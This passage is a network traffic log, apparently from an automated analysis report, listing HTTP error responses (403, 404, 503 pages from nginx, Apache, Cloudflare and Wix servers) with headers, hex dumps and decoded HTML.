{"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8c13bf02c42-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:15 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfoyUM9YSfZMgYRZ53peL3e,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460316.93917328881916053X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nrMPFUkDtdluTbCluQMPrGG82NYl6VzIEyJ2AwgZey6zbGK1igvy3QjaHbU2plWMxGUBZfEscL2qB6b1t5oiy9tRr8hFPku3%2FJa8rUuzUZQdjbAnguLlWBr1%2BGfYm4fo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8c4ec982c23-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9LTVFI2LR2tOx4UITwbTJTBAoECSQixMeqEpdMbb1DpvFzwMIVeaE%2FHN6UEL%2FGdBCH6wVg5n6Lw1DDfl906lA1D0QVcEH1zPzmiLm3ZlGDO1r%2FGQqI0XfoZdA%2BfT5sa8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8c51cbd2c23-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:17 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:17 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:17 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:45:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 